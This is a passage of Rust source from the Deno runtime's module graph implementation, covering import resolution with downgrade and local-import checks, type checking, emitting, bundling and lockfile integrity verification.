impl fmt::Display for GraphError {
fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result {
match self {
GraphError::InvalidDowngrade(ref specifier, ref location) => write!(f, "Modules imported via https are not allowed to import http modules.\n Importing: {}\n at {}", specifier, location),
GraphError::InvalidLocalImport(ref specifier, ref location) => write!(f, "Remote modules are not allowed to import local modules. Consider using a dynamic import instead.\n Importing: {}\n at {}", specifier, location),
GraphError::InvalidSource(ref specifier, ref lockfile) => write!(f, "The source code is invalid, as it does not match the expected hash in the lock file.\n Specifier: {}\n Lock file: {}", specifier, lockfile.to_str().unwrap()),
GraphError::MissingDependency(ref referrer, specifier) => write!(
f,
"The graph is missing a dependency.\n Specifier: {} from {}",
specifier, referrer
),
GraphError::MissingSpecifier(ref specifier) => write!(
f,
"The graph is missing a specifier.\n Specifier: {}",
specifier
),
GraphError::NotSupported(ref msg) => write!(f, "{}", msg),
GraphError::UnsupportedImportType(ref specifier, ref media_type) => write!(f, "An unsupported media type was attempted to be imported as a module.\n Specifier: {}\n MediaType: {}", specifier, media_type),
}
}
}
impl Error for GraphError {}
/// A structure for handling bundle loading, which is implemented here, to
/// avoid a circular dependency with `ast`.
struct BundleLoader<'a> {
cm: Rc<swc_common::SourceMap>,
emit_options: &'a ast::EmitOptions,
globals: &'a swc_common::Globals,
graph: &'a Graph2,
}
impl<'a> BundleLoader<'a> {
pub fn new(
graph: &'a Graph2,
emit_options: &'a ast::EmitOptions,
globals: &'a swc_common::Globals,
cm: Rc<swc_common::SourceMap>,
) -> Self {
BundleLoader {
cm,
emit_options,
globals,
graph,
}
}
}
impl swc_bundler::Load for BundleLoader<'_> {
fn load(
&self,
file: &swc_common::FileName,
) -> Result<(Rc<swc_common::SourceFile>, swc_ecmascript::ast::Module), AnyError>
{
match file {
swc_common::FileName::Custom(filename) => {
let specifier = ModuleSpecifier::resolve_url_or_path(filename)
.context("Failed to convert swc FileName to ModuleSpecifier.")?;
if let Some(src) = self.graph.get_source(&specifier) {
let media_type = self
.graph
.get_media_type(&specifier)
.context("Looking up media type during bundling.")?;
transpile_module(
filename,
&src,
&media_type,
self.emit_options,
self.globals,
self.cm.clone(),
)
} else {
Err(
GraphError::MissingDependency(specifier, "<bundle>".to_string())
.into(),
)
}
}
_ => unreachable!("Received request for unsupported filename {:?}", file),
}
}
}
/// An enum which represents the parsed out values of references in source code.
#[derive(Debug, Clone, Eq, PartialEq)]
enum TypeScriptReference {
Path(String),
Types(String),
}
/// Determine if a comment contains a triple slash reference and optionally
/// return its kind and value.
fn parse_ts_reference(comment: &str) -> Option<TypeScriptReference> {
if !TRIPLE_SLASH_REFERENCE_RE.is_match(comment) {
None
} else if let Some(captures) = PATH_REFERENCE_RE.captures(comment) {
Some(TypeScriptReference::Path(
captures.get(1).unwrap().as_str().to_string(),
))
} else if let Some(captures) = TYPES_REFERENCE_RE.captures(comment) {
Some(TypeScriptReference::Types(
captures.get(1).unwrap().as_str().to_string(),
))
} else {
None
}
}
/// Determine if a comment contains a `@deno-types` pragma and optionally return
/// its value.
fn parse_deno_types(comment: &str) -> Option<String> {
if let Some(captures) = DENO_TYPES_RE.captures(comment) {
if let Some(m) = captures.get(1) {
Some(m.as_str().to_string())
} else if let Some(m) = captures.get(2) {
Some(m.as_str().to_string())
} else {
panic!("unreachable");
}
} else {
None
}
}
/// A hashing function that takes the source code, version and optionally a
/// user provided config and generates a string hash which can be stored to
/// determine if the cached emit is valid or not.
fn get_version(source: &str, version: &str, config: &[u8]) -> String {
crate::checksum::gen(&[source.as_bytes(), version.as_bytes(), config])
}
/// A logical representation of a module within a graph.
#[derive(Debug, Clone)]
struct Module {
dependencies: DependencyMap,
is_dirty: bool,
is_parsed: bool,
maybe_emit: Option<Emit>,
maybe_emit_path: Option<(PathBuf, Option<PathBuf>)>,
maybe_import_map: Option<Rc<RefCell<ImportMap>>>,
maybe_parsed_module: Option<ParsedModule>,
maybe_types: Option<(String, ModuleSpecifier)>,
maybe_version: Option<String>,
media_type: MediaType,
specifier: ModuleSpecifier,
source: String,
source_path: PathBuf,
}
impl Default for Module {
fn default() -> Self {
Module {
dependencies: HashMap::new(),
is_dirty: false,
is_parsed: false,
maybe_emit: None,
maybe_emit_path: None,
maybe_import_map: None,
maybe_parsed_module: None,
maybe_types: None,
maybe_version: None,
media_type: MediaType::Unknown,
specifier: ModuleSpecifier::resolve_url("file:///example.js").unwrap(),
source: "".to_string(),
source_path: PathBuf::new(),
}
}
}
impl Module {
pub fn new(
cached_module: CachedModule,
is_root: bool,
maybe_import_map: Option<Rc<RefCell<ImportMap>>>,
) -> Self {
// If this is a local root file, and its media type is unknown, set the
// media type to JavaScript. This allows easier ability to create "shell"
// scripts with Deno.
let media_type = if is_root
&& !cached_module.is_remote
&& cached_module.media_type == MediaType::Unknown
{
MediaType::JavaScript
} else {
cached_module.media_type
};
let mut module = Module {
specifier: cached_module.specifier,
maybe_import_map,
media_type,
source: cached_module.source,
source_path: cached_module.source_path,
maybe_emit: cached_module.maybe_emit,
maybe_emit_path: cached_module.maybe_emit_path,
maybe_version: cached_module.maybe_version,
is_dirty: false,
..Self::default()
};
if module.maybe_import_map.is_none() {
if let Some(dependencies) = cached_module.maybe_dependencies {
module.dependencies = dependencies;
module.is_parsed = true;
}
}
module.maybe_types = if let Some(ref specifier) = cached_module.maybe_types
{
Some((
specifier.clone(),
module
.resolve_import(&specifier, None)
.expect("could not resolve module"),
))
} else {
None
};
module
}
/// Return `true` if the current hash of the module matches the stored
/// version.
pub fn is_emit_valid(&self, config: &[u8]) -> bool {
if let Some(version) = self.maybe_version.clone() {
version == get_version(&self.source, version::DENO, config)
} else {
false
}
}
/// Parse a module, populating the structure with data retrieved from the
/// source of the module.
pub fn parse(&mut self) -> Result<(), AnyError> {
let parsed_module =
parse(self.specifier.as_str(), &self.source, &self.media_type)?;
// parse out any triple slash references
for comment in parsed_module.get_leading_comments().iter() {
if let Some(ts_reference) = parse_ts_reference(&comment.text) {
let location = parsed_module.get_location(&comment.span);
match ts_reference {
TypeScriptReference::Path(import) => {
let specifier =
self.resolve_import(&import, Some(location.clone()))?;
let dep = self
.dependencies
.entry(import)
.or_insert_with(|| Dependency::new(location));
dep.maybe_code = Some(specifier);
}
TypeScriptReference::Types(import) => {
let specifier =
self.resolve_import(&import, Some(location.clone()))?;
if self.media_type == MediaType::JavaScript
|| self.media_type == MediaType::JSX
{
// TODO(kitsonk) we need to specifically update the cache when
// this value changes
self.maybe_types = Some((import.clone(), specifier));
} else {
let dep = self
.dependencies
.entry(import)
.or_insert_with(|| Dependency::new(location));
dep.maybe_type = Some(specifier);
}
}
}
}
}
// Parse out all the syntactical dependencies for a module
let dependencies = parsed_module.analyze_dependencies();
for desc in dependencies.iter().filter(|desc| {
desc.kind != swc_ecmascript::dep_graph::DependencyKind::Require
}) {
let location = Location {
filename: self.specifier.to_string(),
col: desc.col,
line: desc.line,
};
// In situations where there is a potential issue with resolving the
// import specifier, that ends up being a module resolution error for a
// code dependency, we should not throw in the `ModuleGraph` but instead
// wait until runtime and throw there, as with dynamic imports they need
// to be catchable, which means they need to be resolved at runtime.
let maybe_specifier =
match self.resolve_import(&desc.specifier, Some(location.clone())) {
Ok(specifier) => Some(specifier),
Err(any_error) => {
match any_error.downcast_ref::<ModuleResolutionError>() {
Some(ModuleResolutionError::ImportPrefixMissing(_, _)) => None,
_ => {
return Err(any_error);
}
}
}
};
// Parse out any `@deno-types` pragmas and modify dependency
let maybe_type = if !desc.leading_comments.is_empty() {
let comment = desc.leading_comments.last().unwrap();
if let Some(deno_types) = parse_deno_types(&comment.text).as_ref() {
Some(self.resolve_import(deno_types, Some(location.clone()))?)
} else {
None
}
} else {
None
};
let dep = self
.dependencies
.entry(desc.specifier.to_string())
.or_insert_with(|| Dependency::new(location));
dep.is_dynamic = desc.is_dynamic;
if let Some(specifier) = maybe_specifier {
if desc.kind == swc_ecmascript::dep_graph::DependencyKind::ExportType
|| desc.kind == swc_ecmascript::dep_graph::DependencyKind::ImportType
{
dep.maybe_type = Some(specifier);
} else {
dep.maybe_code = Some(specifier);
}
}
// If the dependency wasn't a type only dependency already, and there is
// a `@deno-types` comment, then we will set the `maybe_type` dependency.
if maybe_type.is_some() && dep.maybe_type.is_none() {
dep.maybe_type = maybe_type;
}
}
self.maybe_parsed_module = Some(parsed_module);
Ok(())
}
fn resolve_import(
&self,
specifier: &str,
maybe_location: Option<Location>,
) -> Result<ModuleSpecifier, AnyError> {
let maybe_resolve = if let Some(import_map) = self.maybe_import_map.clone()
{
import_map
.borrow()
.resolve(specifier, self.specifier.as_str())?
} else {
None
};
let specifier = if let Some(module_specifier) = maybe_resolve {
module_specifier
} else {
ModuleSpecifier::resolve_import(specifier, self.specifier.as_str())?
};
let referrer_scheme = self.specifier.as_url().scheme();
let specifier_scheme = specifier.as_url().scheme();
let location = maybe_location.unwrap_or(Location {
filename: self.specifier.to_string(),
line: 0,
col: 0,
});
// Disallow downgrades from HTTPS to HTTP
if referrer_scheme == "https" && specifier_scheme == "http" {
return Err(
GraphError::InvalidDowngrade(specifier.clone(), location).into(),
);
}
// Disallow a remote URL from trying to import a local URL
if (referrer_scheme == "https" || referrer_scheme == "http")
&& !(specifier_scheme == "https" || specifier_scheme == "http")
{
return Err(
GraphError::InvalidLocalImport(specifier.clone(), location).into(),
);
}
Ok(specifier)
}
/// Calculate the hashed version of the module and update the `maybe_version`.
pub fn set_version(&mut self, config: &[u8]) {
self.maybe_version = Some(get_version(&self.source, version::DENO, config))
}
pub fn size(&self) -> usize {
self.source.as_bytes().len()
}
}
#[derive(Clone, Debug, Default, Eq, PartialEq)]
pub struct Stats(pub Vec<(String, u128)>);
impl<'de> Deserialize<'de> for Stats {
fn deserialize<D>(deserializer: D) -> result::Result<Self, D::Error>
where
D: Deserializer<'de>,
{
let items: Vec<(String, u128)> = Deserialize::deserialize(deserializer)?;
Ok(Stats(items))
}
}
impl fmt::Display for Stats {
fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result {
writeln!(f, "Compilation statistics:")?;
for (key, value) in self.0.clone() {
writeln!(f, " {}: {}", key, value)?;
}
Ok(())
}
}
/// A structure that provides information about a module graph result.
#[derive(Debug, Default)]
pub struct ResultInfo {
/// A structure which provides diagnostic information (usually from `tsc`)
/// about the code in the module graph.
pub diagnostics: Diagnostics,
/// Optionally ignored compiler options that represent any options that were
/// ignored if there was a user provided configuration.
pub maybe_ignored_options: Option<IgnoredCompilerOptions>,
/// A structure providing key metrics around the operation performed, in
/// milliseconds.
pub stats: Stats,
}
/// Represents the "default" type library that should be used when type
/// checking the code in the module graph. Note that a user provided config
/// of `"lib"` would override this value.
#[derive(Debug, Clone, Eq, PartialEq)]
pub enum TypeLib {
DenoWindow,
DenoWorker,
UnstableDenoWindow,
UnstableDenoWorker,
}
impl Default for TypeLib {
fn default() -> Self {
TypeLib::DenoWindow
}
}
impl Serialize for TypeLib {
fn serialize<S>(&self, serializer: S) -> Result<S::Ok, S::Error>
where
S: Serializer,
{
let value = match self {
TypeLib::DenoWindow => vec!["deno.window".to_string()],
TypeLib::DenoWorker => vec!["deno.worker".to_string()],
TypeLib::UnstableDenoWindow => {
vec!["deno.window".to_string(), "deno.unstable".to_string()]
}
TypeLib::UnstableDenoWorker => {
vec!["deno.worker".to_string(), "deno.worker".to_string()]
}
};
Serialize::serialize(&value, serializer)
}
}
#[derive(Debug, Default)]
pub struct BundleOptions {
/// If `true` then debug logging will be output from the isolate.
pub debug: bool,
/// An optional string that points to a user supplied TypeScript configuration
/// file that augments the the default configuration passed to the TypeScript
/// compiler.
pub maybe_config_path: Option<String>,
}
#[derive(Debug, Default)]
pub struct CheckOptions {
/// If `true` then debug logging will be output from the isolate.
pub debug: bool,
/// Utilise the emit from `tsc` to update the emitted code for modules.
pub emit: bool,
/// The base type libraries that should be used when type checking.
pub lib: TypeLib,
/// An optional string that points to a user supplied TypeScript configuration
/// file that augments the the default configuration passed to the TypeScript
/// compiler.
pub maybe_config_path: Option<String>,
/// Ignore any previously emits and ensure that all files are emitted from
/// source.
pub reload: bool,
}
#[derive(Debug, Eq, PartialEq)]
pub enum BundleType {
/// Return the emitted contents of the program as a single "flattened" ES
/// module.
Esm,
// TODO(@kitsonk) once available in swc
// Iife,
/// Do not bundle the emit, instead returning each of the modules that are
/// part of the program as individual files.
None,
}
impl Default for BundleType {
fn default() -> Self {
BundleType::None
}
}
#[derive(Debug, Default)]
pub struct EmitOptions {
/// Indicate the form the result of the emit should take.
pub bundle_type: BundleType,
/// If `true` then debug logging will be output from the isolate.
pub debug: bool,
/// An optional map that contains user supplied TypeScript compiler
/// configuration options that are passed to the TypeScript compiler.
pub maybe_user_config: Option<HashMap<String, Value>>,
}
/// A structure which provides options when transpiling modules.
#[derive(Debug, Default)]
pub struct TranspileOptions {
/// If `true` then debug logging will be output from the isolate.
pub debug: bool,
/// An optional string that points to a user supplied TypeScript configuration
/// file that augments the the default configuration passed to the TypeScript
/// compiler.
pub maybe_config_path: Option<String>,
/// Ignore any previously emits and ensure that all files are emitted from
/// source.
pub reload: bool,
}
/// A dependency graph of modules, were the modules that have been inserted via
/// the builder will be loaded into the graph. Also provides an interface to
/// be able to manipulate and handle the graph.
#[derive(Debug, Clone)]
pub struct Graph2 {
/// A reference to the specifier handler that will retrieve and cache modules
/// for the graph.
handler: Rc<RefCell<dyn SpecifierHandler>>,
/// Optional TypeScript build info that will be passed to `tsc` if `tsc` is
/// invoked.
maybe_tsbuildinfo: Option<String>,
/// The modules that are part of the graph.
modules: HashMap<ModuleSpecifier, Module>,
/// A map of redirects, where a module specifier is redirected to another
/// module specifier by the handler. All modules references should be
/// resolved internally via this, before attempting to access the module via
/// the handler, to make sure the correct modules is being dealt with.
redirects: HashMap<ModuleSpecifier, ModuleSpecifier>,
/// The module specifiers that have been uniquely added to the graph, which
/// does not include any transient dependencies.
roots: Vec<ModuleSpecifier>,
/// If all of the root modules are dynamically imported, then this is true.
/// This is used to ensure correct `--reload` behavior, where subsequent
/// calls to a module graph where the emit is already valid do not cause the
/// graph to re-emit.
roots_dynamic: bool,
// A reference to lock file that will be used to check module integrity.
maybe_lockfile: Option<Arc<Mutex<Lockfile>>>,
}
impl Graph2 {
/// Create a new instance of a graph, ready to have modules loaded it.
///
/// The argument `handler` is an instance of a structure that implements the
/// `SpecifierHandler` trait.
///
pub fn new(
handler: Rc<RefCell<dyn SpecifierHandler>>,
maybe_lockfile: Option<Arc<Mutex<Lockfile>>>,
) -> Self {
Graph2 {
handler,
maybe_tsbuildinfo: None,
modules: HashMap::new(),
redirects: HashMap::new(),
roots: Vec::new(),
roots_dynamic: true,
maybe_lockfile,
}
}
/// Transform the module graph into a single JavaScript module which is
/// returned as a `String` in the result.
pub fn bundle(
&self,
options: BundleOptions,
) -> Result<(String, Stats, Option<IgnoredCompilerOptions>), AnyError> {
if self.roots.is_empty() || self.roots.len() > 1 {
return Err(GraphError::NotSupported(format!("Bundling is only supported when there is a single root module in the graph. Found: {}", self.roots.len())).into());
}
let start = Instant::now();
let root_specifier = self.roots[0].clone();
let mut ts_config = TsConfig::new(json!({
"checkJs": false,
"emitDecoratorMetadata": false,
"inlineSourceMap": true,
"jsx": "react",
"jsxFactory": "React.createElement",
"jsxFragmentFactory": "React.Fragment",
}));
let maybe_ignored_options =
ts_config.merge_tsconfig(options.maybe_config_path)?;
let s = self.emit_bundle(&root_specifier, &ts_config.into())?;
let stats = Stats(vec![
("Files".to_string(), self.modules.len() as u128),
("Total time".to_string(), start.elapsed().as_millis()),
]);
Ok((s, stats, maybe_ignored_options))
}
/// Type check the module graph, corresponding to the options provided.
pub fn check(self, options: CheckOptions) -> Result<ResultInfo, AnyError> {
let mut config = TsConfig::new(json!({
"allowJs": true,
// TODO(@kitsonk) is this really needed?
"esModuleInterop": true,
// Enabled by default to align to transpile/swc defaults
"experimentalDecorators": true,
"incremental": true,
"isolatedModules": true,
"lib": options.lib,
"module": "esnext",
"strict": true,
"target": "esnext",
"tsBuildInfoFile": "deno:///.tsbuildinfo",
}));
if options.emit {
config.merge(&json!({
// TODO(@kitsonk) consider enabling this by default
// see: https://github.com/denoland/deno/issues/7732
"emitDecoratorMetadata": false,
"jsx": "react",
"inlineSourceMap": true,
"outDir": "deno://",
"removeComments": true,
}));
} else {
config.merge(&json!({
"noEmit": true,
}));
}
let maybe_ignored_options =
config.merge_tsconfig(options.maybe_config_path)?;
// Short circuit if none of the modules require an emit, or all of the
// modules that require an emit have a valid emit. There is also an edge
// case where there are multiple imports of a dynamic module during a
// single invocation, if that is the case, even if there is a reload, we
// will simply look at if the emit is invalid, to avoid two checks for the
// same programme.
if !self.needs_emit(&config)
|| (self.is_emit_valid(&config)
&& (!options.reload || self.roots_dynamic))
{
debug!("graph does not need to be checked or emitted.");
return Ok(ResultInfo {
maybe_ignored_options,
..Default::default()
});
}
// TODO(@kitsonk) not totally happy with this here, but this is the first
// point where we know we are actually going to check the program. If we
// moved it out of here, we wouldn't know until after the check has already
// happened, which isn't informative to the users.
for specifier in &self.roots {
info!("{} {}", colors::green("Check"), specifier);
}
let root_names = self.get_root_names();
let maybe_tsbuildinfo = self.maybe_tsbuildinfo.clone();
let hash_data =
vec![config.as_bytes(), version::DENO.as_bytes().to_owned()];
let graph = Rc::new(RefCell::new(self));
let response = tsc2::exec(
js::compiler_isolate_init(),
tsc2::Request {
config: config.clone(),
debug: options.debug,
graph: graph.clone(),
hash_data,
maybe_tsbuildinfo,
root_names,
},
)?;
let mut graph = graph.borrow_mut();
graph.maybe_tsbuildinfo = response.maybe_tsbuildinfo;
// Only process changes to the graph if there are no diagnostics and there
// were files emitted.
if response.diagnostics.is_empty() && !response.emitted_files.is_empty() {
let mut codes = HashMap::new();
let mut maps = HashMap::new();
let check_js = config.get_check_js();
for emit in &response.emitted_files {
if let Some(specifiers) = &emit.maybe_specifiers {
assert!(specifiers.len() == 1, "Unexpected specifier length");
// The specifier emitted might not be the redirected specifier, and
// therefore we need to ensure it is the correct one.
let specifier = graph.resolve_specifier(&specifiers[0]);
// Sometimes if tsc sees a CommonJS file it will _helpfully_ output it
// to ESM, which we don't really want unless someone has enabled the
// check_js option.
if !check_js
&& graph.get_media_type(&specifier) == Some(MediaType::JavaScript)
{
debug!("skipping emit for {}", specifier);
continue;
}
match emit.media_type {
MediaType::JavaScript => {
codes.insert(specifier.clone(), emit.data.clone());
}
MediaType::SourceMap => {
maps.insert(specifier.clone(), emit.data.clone());
}
_ => unreachable!(),
}
}
}
let config = config.as_bytes();
for (specifier, code) in codes.iter() {
if let Some(module) = graph.get_module_mut(specifier) {
module.maybe_emit =
Some(Emit::Cli((code.clone(), maps.get(specifier).cloned())));
module.set_version(&config);
module.is_dirty = true;
} else {
return Err(GraphError::MissingSpecifier(specifier.clone()).into());
}
}
}
graph.flush()?;
Ok(ResultInfo {
diagnostics: response.diagnostics,
maybe_ignored_options,
stats: response.stats,
})
}
fn contains_module(&self, specifier: &ModuleSpecifier) -> bool {
let s = self.resolve_specifier(specifier);
self.modules.contains_key(s)
}
/// Emit the module graph in a specific format. This is specifically designed
/// to be an "all-in-one" API for access by the runtime, allowing both
/// emitting single modules as well as bundles, using Deno module resolution
/// or supplied sources.
pub fn emit(
self,
options: EmitOptions,
) -> Result<(HashMap<String, String>, ResultInfo), AnyError> {
let mut config = TsConfig::new(json!({
"allowJs": true,
// TODO(@kitsonk) consider enabling this by default
// see: https://github.com/denoland/deno/issues/7732
"emitDecoratorMetadata": false,
"esModuleInterop": true,
"experimentalDecorators": true,
"isolatedModules": true,
"jsx": "react",
"lib": TypeLib::DenoWindow,
"module": "esnext",
"strict": true,
"target": "esnext",
}));
let opts = match options.bundle_type {
BundleType::Esm => json!({
"checkJs": false,
"inlineSourceMap": false,
"noEmit": true,
"jsxFactory": "React.createElement",
"jsxFragmentFactory": "React.Fragment",
}),
BundleType::None => json!({
"outDir": "deno://",
"removeComments": true,
"sourceMap": true,
}),
};
config.merge(&opts);
let maybe_ignored_options =
if let Some(user_options) = &options.maybe_user_config {
config.merge_user_config(user_options)?
} else {
None
};
let root_names = self.get_root_names();
let hash_data =
vec![config.as_bytes(), version::DENO.as_bytes().to_owned()];
let graph = Rc::new(RefCell::new(self));
let response = tsc2::exec(
js::compiler_isolate_init(),
tsc2::Request {
config: config.clone(),
debug: options.debug,
graph: graph.clone(),
hash_data,
maybe_tsbuildinfo: None,
root_names,
},
)?;
let mut emitted_files = HashMap::new();
match options.bundle_type {
BundleType::Esm => {
assert!(
response.emitted_files.is_empty(),
"No files should have been emitted from tsc."
);
let graph = graph.borrow();
assert_eq!(
graph.roots.len(),
1,
"Only a single root module supported."
);
let specifier = &graph.roots[0];
let s = graph.emit_bundle(specifier, &config.into())?;
emitted_files.insert("deno:///bundle.js".to_string(), s);
}
BundleType::None => {
for emitted_file in &response.emitted_files {
assert!(
emitted_file.maybe_specifiers.is_some(),
"Orphaned file emitted."
);
let specifiers = emitted_file.maybe_specifiers.clone().unwrap();
assert_eq!(
specifiers.len(),
1,
"An unexpected number of specifiers associated with emitted file."
);
let specifier = specifiers[0].clone();
let extension = match emitted_file.media_type {
MediaType::JavaScript => ".js",
MediaType::SourceMap => ".js.map",
_ => unreachable!(),
};
let key = format!("{}{}", specifier, extension);
emitted_files.insert(key, emitted_file.data.clone());
}
}
};
Ok((
emitted_files,
ResultInfo {
diagnostics: response.diagnostics,
maybe_ignored_options,
stats: response.stats,
},
))
}
/// Shared between `bundle()` and `emit()`.
fn emit_bundle(
&self,
specifier: &ModuleSpecifier,
emit_options: &ast::EmitOptions,
) -> Result<String, AnyError> {
let cm = Rc::new(swc_common::SourceMap::new(
swc_common::FilePathMapping::empty(),
));
let globals = swc_common::Globals::new();
let loader = BundleLoader::new(self, emit_options, &globals, cm.clone());
let hook = Box::new(BundleHook);
let bundler = swc_bundler::Bundler::new(
&globals,
cm.clone(),
loader,
self,
swc_bundler::Config::default(),
hook,
);
let mut entries = HashMap::new();
entries.insert(
"bundle".to_string(),
swc_common::FileName::Custom(specifier.to_string()),
);
let output = bundler
.bundle(entries)
.context("Unable to output bundle during Graph2::bundle().")?;
let mut buf = Vec::new();
{
let mut emitter = swc_ecmascript::codegen::Emitter {
cfg: swc_ecmascript::codegen::Config { minify: false },
cm: cm.clone(),
comments: None,
wr: Box::new(swc_ecmascript::codegen::text_writer::JsWriter::new(
cm, "\n", &mut buf, None,
)),
};
emitter
.emit_module(&output[0].module)
.context("Unable to emit bundle during Graph2::bundle().")?;
}
String::from_utf8(buf).context("Emitted bundle is an invalid utf-8 string.")
}
/// Update the handler with any modules that are marked as _dirty_ and update
/// any build info if present.
fn flush(&mut self) -> Result<(), AnyError> {
let mut handler = self.handler.borrow_mut();
for (_, module) in self.modules.iter_mut() {
if module.is_dirty {
if let Some(emit) = &module.maybe_emit {
handler.set_cache(&module.specifier, emit)?;
}
if let Some(version) = &module.maybe_version {
handler.set_version(&module.specifier, version.clone())?;
}
module.is_dirty = false;
}
}
for root_specifier in self.roots.iter() {
if let Some(tsbuildinfo) = &self.maybe_tsbuildinfo {
handler.set_tsbuildinfo(root_specifier, tsbuildinfo.to_owned())?;
}
}
Ok(())
}
fn get_info(
&self,
specifier: &ModuleSpecifier,
seen: &mut HashSet<ModuleSpecifier>,
totals: &mut HashMap<ModuleSpecifier, usize>,
) -> ModuleInfo {
let not_seen = seen.insert(specifier.clone());
let module = self.get_module(specifier).unwrap();
let mut deps = Vec::new();
let mut total_size = None;
if not_seen {
let mut seen_deps = HashSet::new();
// TODO(@kitsonk) https://github.com/denoland/deno/issues/7927
for (_, dep) in module.dependencies.iter() {
// Check the runtime code dependency
if let Some(code_dep) = &dep.maybe_code {
if seen_deps.insert(code_dep.clone()) {
deps.push(self.get_info(code_dep, seen, totals));
}
}
}
deps.sort();
total_size = if let Some(total) = totals.get(specifier) {
Some(total.to_owned())
} else {
let mut total = deps
.iter()
.map(|d| {
if let Some(total_size) = d.total_size {
total_size
} else {
0
}
})
.sum();
total += module.size();
totals.insert(specifier.clone(), total);
Some(total)
};
}
ModuleInfo {
deps,
name: specifier.clone(),
size: module.size(),
total_size,
}
}
fn get_info_map(&self) -> ModuleInfoMap {
let map = self
.modules
.iter()
.map(|(specifier, module)| {
let mut deps = HashSet::new();
for (_, dep) in module.dependencies.iter() {
if let Some(code_dep) = &dep.maybe_code {
deps.insert(code_dep.clone());
}
if let Some(type_dep) = &dep.maybe_type {
deps.insert(type_dep.clone());
}
}
if let Some((_, types_dep)) = &module.maybe_types {
deps.insert(types_dep.clone());
}
let item = ModuleInfoMapItem {
deps: deps.into_iter().collect(),
size: module.size(),
};
(specifier.clone(), item)
})
.collect();
ModuleInfoMap::new(map)
}
pub fn get_media_type(
&self,
specifier: &ModuleSpecifier,
) -> Option<MediaType> {
if let Some(module) = self.get_module(specifier) {
Some(module.media_type)
} else {
None
}
}
fn get_module(&self, specifier: &ModuleSpecifier) -> Option<&Module> {
let s = self.resolve_specifier(specifier);
self.modules.get(s)
}
fn get_module_mut(
&mut self,
specifier: &ModuleSpecifier,
) -> Option<&mut Module> {
// this is duplicated code because `.resolve_specifier` requires an
// immutable borrow, but if `.resolve_specifier` is mut, then everything
// that calls it is is mut
let mut s = specifier;
while let Some(redirect) = self.redirects.get(s) {
s = redirect;
}
self.modules.get_mut(s)
}
/// Consume graph and return list of all module specifiers contained in the
/// graph.
pub fn get_modules(&self) -> Vec<ModuleSpecifier> {
self.modules.keys().map(|s| s.to_owned()).collect()
}
/// Transform `self.roots` into something that works for `tsc`, because `tsc`
/// doesn't like root names without extensions that match its expectations,
/// nor does it have any concept of redirection, so we have to resolve all
/// that upfront before feeding it to `tsc`.
fn get_root_names(&self) -> Vec<(ModuleSpecifier, MediaType)> {
self
.roots
.iter()
.map(|ms| {
(
// root modules can be redirects, so before we pass it to tsc we need
// to resolve the redirect
self.resolve_specifier(ms).clone(),
self.get_media_type(ms).unwrap(),
)
})
.collect()
}
/// Get the source for a given module specifier. If the module is not part
/// of the graph, the result will be `None`.
pub fn get_source(&self, specifier: &ModuleSpecifier) -> Option<String> {
if let Some(module) = self.get_module(specifier) {
Some(module.source.clone())
} else {
None
}
}
/// Return a structure which provides information about the module graph and
/// the relationship of the modules in the graph. This structure is used to
/// provide information for the `info` subcommand.
pub fn info(&self) -> Result<ModuleGraphInfo, AnyError> {
if self.roots.is_empty() || self.roots.len() > 1 {
return Err(GraphError::NotSupported(format!("Info is only supported when there is a single root module in the graph. Found: {}", self.roots.len())).into());
}
let module = self.roots[0].clone();
let m = self.get_module(&module).unwrap();
let mut seen = HashSet::new();
let mut totals = HashMap::new();
let info = self.get_info(&module, &mut seen, &mut totals);
let files = self.get_info_map();
let total_size = totals.get(&module).unwrap_or(&m.size()).to_owned();
let (compiled, map) =
if let Some((emit_path, maybe_map_path)) = &m.maybe_emit_path {
(Some(emit_path.clone()), maybe_map_path.clone())
} else {
(None, None)
};
Ok(ModuleGraphInfo {
compiled,
dep_count: self.modules.len() - 1,
file_type: m.media_type,
files,
info,
local: m.source_path.clone(),
map,
module,
total_size,
})
}
/// Determines if all of the modules in the graph that require an emit have
/// a valid emit. Returns `true` if all the modules have a valid emit,
/// otherwise false.
fn is_emit_valid(&self, config: &TsConfig) -> bool {
let check_js = config.get_check_js();
let config = config.as_bytes();
self.modules.iter().all(|(_, m)| {
let needs_emit = match m.media_type {
MediaType::TypeScript | MediaType::TSX | MediaType::JSX => true,
MediaType::JavaScript => check_js,
_ => false,
};
if needs_emit {
m.is_emit_valid(&config)
} else {
true
}
})
}
/// Verify the subresource integrity of the graph based upon the optional
/// lockfile, updating the lockfile with any missing resources. This will
/// error if any of the resources do not match their lock status.
pub fn lock(&self) {
if let Some(lf) = self.maybe_lockfile.as_ref() {
let mut lockfile = lf.lock().unwrap();
for (ms, module) in self.modules.iter() {
let specifier = module.specifier.to_string();
let valid = lockfile.check_or_insert(&specifier, &module.source);
if !valid {
eprintln!(
"{}",
GraphError::InvalidSource(ms.clone(), lockfile.filename.clone())
);
std::process::exit(10);
}
}
}
}
/// Determines if any of the modules in the graph are required to be emitted.
/// This is similar to `emit_valid()` except that the actual emit isn't
/// checked to determine if it is valid.
fn needs_emit(&self, config: &TsConfig) -> bool {
let check_js = config.get_check_js();
self.modules.iter().any(|(_, m)| match m.media_type {
MediaType::TypeScript | MediaType::TSX | MediaType::JSX => true,
MediaType::JavaScript => check_js,
_ => false,
})
}
/// Given a string specifier and a referring module specifier, provide the
/// resulting module specifier and media type for the module that is part of
/// the graph.
///
/// # Arguments
///
/// * `specifier` - The string form of the module specifier that needs to be
/// resolved.
/// * `referrer` - The referring `ModuleSpecifier`.
/// * `prefer_types` - When resolving to a module specifier, determine if a
/// type dependency is preferred over a code dependency. This is set to
/// `true` when resolving module names for `tsc` as it needs the type
/// dependency over the code, while other consumers do not handle type only
/// dependencies.
pub fn resolve(
&self,
specifier: &str,
referrer: &ModuleSpecifier,
prefer_types: bool,
) -> Result<ModuleSpecifier, AnyError> {
if !self.contains_module(referrer) {
return Err(GraphError::MissingSpecifier(referrer.to_owned()).into());
}
let module = self.get_module(referrer).unwrap();
if !module.dependencies.contains_key(specifier) {
return Err(
GraphError::MissingDependency(
referrer.to_owned(),
specifier.to_owned(),
)
.into(),
);
}
let dependency = module.dependencies.get(specifier).unwrap();
// If there is a @deno-types pragma that impacts the dependency, then the
// maybe_type property will be set with that specifier, otherwise we use the
// specifier that point to the runtime code.
let resolved_specifier = if prefer_types && dependency.maybe_type.is_some()
{
dependency.maybe_type.clone().unwrap()
} else if let Some(code_specifier) = dependency.maybe_code.clone() {
code_specifier
} else {
return Err(
GraphError::MissingDependency(
referrer.to_owned(),
specifier.to_owned(),
)
